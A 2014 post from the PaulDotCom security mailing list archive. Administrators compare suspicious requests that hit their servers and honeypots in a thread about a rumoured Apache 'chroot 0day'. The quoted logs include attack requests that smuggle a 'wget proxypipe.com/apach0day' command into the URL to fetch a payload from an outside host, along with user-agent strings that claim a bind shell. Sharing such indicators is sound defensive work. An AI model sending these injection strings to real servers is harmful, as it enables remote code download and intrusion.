PaulDotCom mailing list archives
Re: [Security Weekly] apache chroot 0day?
From: Bruno Savioli <bruno () savioli org>
Date: Tue, 29 Jul 2014 09:44:04 +0100
I got the same on 7 different servers. Plus, I also had this, from the same IP on 25/06 on 3 of my servers: GET /rutorrent HTTP/1.0 User-Agent: Chrome 14.2.0 Mozilla (Gecko)Accept: */* Bruno On 29 July 2014 08:05, Lutz Schildt <ls () lsmooth de> wrote:
Am 28.07.2014 21:26, schrieb Lutz Schildt: I've seen the same request on one of my honeypots and a second one a fewhours later from the same IP: GET/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget proxypipe.com/apach0day; HTTP/1.0 User-agent: chroot-apach0day Referrer: /xA/x0a/x06 _______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.comAnother one: GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget proxypipe.com/apach0day; HTTP/1.0 User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED _______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
-- - Bruno
_______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- Re: [Security Weekly] apache chroot 0day?, (continued)
- Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Ken Pryor (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Oleg Laskin (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Xavier Mertens (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? xgermx (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Ben Jackson (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Bruno Savioli (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 29)